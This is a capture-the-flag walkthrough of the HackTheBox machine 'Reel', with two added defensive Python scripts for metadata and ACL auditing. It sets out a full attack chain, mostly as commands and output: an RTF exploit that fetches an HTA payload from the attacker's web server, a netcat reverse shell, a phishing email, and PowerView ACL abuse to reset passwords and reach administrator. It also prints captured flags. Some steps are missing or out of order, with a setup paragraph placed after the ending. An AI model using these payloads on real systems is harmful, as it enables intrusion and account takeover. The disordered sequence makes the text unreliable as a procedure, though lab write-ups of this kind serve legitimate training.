As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of the nmap timing templates.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Mon Sep 12 22:07:39 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
# Nmap done at Mon Sep 12 22:08:06 2022 -- 1 IP address (1 host up) scanned in 26.56 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Sep 12 22:10:40 2022 as: nmap -sCV -p21,22,25 -oN targeted 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 12 22:13:32 2022 -- 1 IP address (1 host up) scanned in 171.82 seconds
Anonymous login is enabled in the FTP server.
ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
Inside the FTP server there is one directory called documents with some files.
ftp> ls documents
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
Let's transfer all of them to our current machine.
ftp> get AppLocker.docx
ftp> get readme.txt
ftp> get Windows\ Event\ Forwarding.docx
The readme.txt file says that someone reviews any .rtf files sent to their email.
cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
The AppLocker.docx file, converted to text with docx2txt, has some instructions about an AppLocker procedure.
docx2txt AppLocker.docx; cat AppLocker.txt
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
The Windows Event Forwarding.docx file seems to be corrupted, so we cannot see its content.
docx2txt Windows\ Event\ Forwarding.docx
Failed to extract required information from <Windows Event Forwarding.docx>!
But, we can see an email in the metadata.
exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.44
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 22:13:23+01:00
File Access Date/Time : 2022:09:13 00:41:48+02:00
File Inode Change Date/Time : 2022:09:13 00:41:48+02:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
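As an added example (not part of the original writeup), the script below reads the same core properties straight out of the .docx package with the Python standard library and flags any email address stored in them, which is what a document owner would run before publishing a file. The sample document is constructed in memory from the values in the exiftool output above.

```python
# Added example: Office core properties live in docProps/core.xml inside the
# .docx zip; that is where exiftool read "Creator: nico@megabank.com" from.
# The sample document is constructed here so the script runs offline.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

def build_sample_docx() -> bytes:
    """Construct a minimal .docx (a zip) carrying only the core properties."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}" '
        f'xmlns:dcterms="{NS["dcterms"]}">'
        '<dc:creator>nico@megabank.com</dc:creator>'
        '<cp:revision>4</cp:revision>'
        '<dcterms:created>2017-10-31T18:42:00Z</dcterms:created>'
        '</cp:coreProperties>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder part
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()

def core_properties(docx_bytes: bytes) -> dict:
    """Return the docProps/core.xml fields as {local tag name: text}."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    return {el.tag.split("}")[1]: (el.text or "") for el in root}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def leaked_emails(docx_bytes: bytes) -> list:
    """Email addresses found in any core property; these should be scrubbed before sharing."""
    found = []
    for value in core_properties(docx_bytes).values():
        for addr in EMAIL_RE.findall(value):
            if addr not in found:
                found.append(addr)
    return found
```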
As port 25 (SMTP) is open, we can check with the smtp-user-enum tool whether the email nico@megabank.com is valid.
In the current directory, we'll have to start a simple HTTP server so the victim machine can download the malicious.hta file.
python -m http.server 80
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, we can execute the script with Python2, and generate the malicious.rtf file.
python2 41894.py -M gen -w malicious.rtf -u http://10.10.14.11/malicious.hta
-M mode, here gen to generate the malicious file only.
-w name of the malicious RTF file.
-u URL of the HTA file.
Generating normal RTF payload.
Generated malicious.rtf successfully
Finally, if we send the malicious file to nico@megabank.com, we should get a shell as nico and be able to grab the user flag.
sendemail -f alfa8sa@megabank.com -t nico@megabank.com -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf
-f sender email address.
-t receiver email address.
-s SMTP server.
-m message to send.
-a file attachment.
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.77] 62436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
htb\nico
type \users\nico\desktop\user.txt
fa363aebcfa2c29897a69af385fee971
Privilege Escalation
On the desktop of the user nico there is a file called cred.xml with an encoded password for the tom user.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
On the desktop of the tom user there is a directory called AD Audit.
dir \Users\tom\Desktop
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop
05/29/2018 08:57 PM <DIR> .
05/29/2018 08:57 PM <DIR> ..
05/29/2018 09:02 PM <DIR> AD Audit
0 File(s) 0 bytes
3 Dir(s) 15,771,508,736 bytes free
There are a few things inside AD Audit.
dir "\Users\tom\Desktop\AD Audit"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 09:02 PM <DIR> .
05/29/2018 09:02 PM <DIR> ..
05/30/2018 12:44 AM <DIR> BloodHound
05/29/2018 09:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,771,508,736 bytes free
The note.txt file says that there is no way to gain admin privileges.
type "\Users\tom\Desktop\AD Audit\note.txt"
Inside the BloodHound directory we can see the PowerView.ps1 script.
dir "\Users\tom\Desktop\AD Audit\BloodHound"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/30/2018 12:44 AM <DIR> .
05/30/2018 12:44 AM <DIR> ..
05/29/2018 08:57 PM <DIR> Ingestors
10/30/2017 11:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,771,508,736 bytes free
And inside the Ingestors directory there are some files and binaries.
dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018 08:57 PM <DIR> .
05/29/2018 08:57 PM <DIR> ..
11/17/2017 12:50 AM 112,225 acls.csv
10/28/2017 09:50 PM 3,549 BloodHound.bin
10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 04:27 PM 568,832 SharpHound.exe
10/24/2017 04:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,771,508,736 bytes free
One of them is acls.csv. Let's transfer it to our local machine: first, start an SMB server with impacket.
impacket-smbserver smbFolder $(pwd) -smb2support
Then, copy the acls.csv file to the smbFolder share.
copy acls.csv \\10.10.14.11\smbFolder\
We can see that the file has a lot of information about objects, principals, rights and access control type.
csvtool readable acls.csv
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
Domain Computers@HTB.LOCAL GROUP Domain Admins@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Account Operators@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Local System@HTB.LOCAL USER GenericAll AccessAllowed False
...
If we grep for tom, we'll see that tom has WriteOwner rights on the claire user.
csvtool readable acls.csv | grep tom
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed False
This means that tom can take ownership of the claire object, grant himself the right to reset her password and then change it. We'll use PowerView.ps1 to do it. First, open a PowerShell shell.
powershell
Then, import the PowerView.ps1 module located in the BloodHound directory.
Import-Module .\PowerView.ps1
Set tom as the owner of the claire object.
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
Give tom the right to reset claire's password.
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Create a credential $cred with the password alfa8sa123$!.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>whoami
htb\claire
If we grep for claire in the acls.csv file, we'll see that she has WriteDacl rights on the Backup_Admins group.
csvtool readable acls.csv | grep claire
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed False
This means that claire can add herself to the Backup_Admins group.
net group Backup_Admins claire /add
The command completed successfully.
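The two grep steps above (tom over claire, claire over Backup_Admins) are one instance of a general ACL audit: find every non-standard control right in the export and chain them. As an added example that is not part of the original writeup, the script below parses a BloodHound-style acls.csv with the standard library and searches for such a chain between two principals; the rows are constructed from the ones quoted on this page, with the columns the page leaves empty left blank.

```python
# Added example: audit a BloodHound acls.csv for control rights and walk the
# chain from one principal to another. SAMPLE_ACLS is constructed from the
# rows shown on this page; a real export has many more rows.
import csv
import io
from collections import deque

SAMPLE_ACLS = """ObjectName,ObjectType,ObjectGuid,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
Domain Computers@HTB.LOCAL,GROUP,,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,False
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
Backup_Admins@HTB.LOCAL,GROUP,,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,False
"""

# Rights that let the holder take control of the target object (reset its
# password, rewrite its DACL, add members, ...). Other rights are ignored.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                  "Owner", "AllExtendedRights", "ForceChangePassword"}

def control_edges(csv_text: str) -> list:
    """(principal, right, object) for every allowed ACE granting a control right."""
    edges = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue
        for right in row["ActiveDirectoryRights"].split(","):
            right = right.strip()
            if right in CONTROL_RIGHTS:
                edges.append((row["PrincipalName"], right, row["ObjectName"]))
    return edges

def takeover_path(csv_text: str, start: str, goal: str) -> list:
    """Shortest chain of (principal, right, object) from start to goal, or [] if none."""
    by_principal = {}
    for src, right, dst in control_edges(csv_text):
        by_principal.setdefault(src, []).append((right, dst))
    queue = deque([(start, [])])  # breadth-first search over control edges
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, nxt in by_principal.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, right, nxt)]))
    return []
```

Every edge in the returned path is one ACE an administrator can review and remove; the chain disappears as soon as any link does.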
In order to get the right permissions, you might need to log out, and then log in again. Now, the user claire is in the Backup_Admins group.
net group Backup_Admins
Group name Backup_Admins
Comment
Members
-------------------------------------------------------------------------------
claire ranj
The command completed successfully.
We can see that the Backup_Admins group has full rights on the \users\administrator directory.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
administrator@REEL C:\Users\Administrator>whoami
htb\administrator
administrator@REEL C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
1018a0331e686176ff4577c728eaf32a
As the email is valid, the idea is to generate a malicious .rtf file and send it to the nico@megabank.com address. There is a Python script that allows us to create malicious .rtf files. First, we'll have to generate a malicious .hta file with msfvenom, which will send us a reverse shell.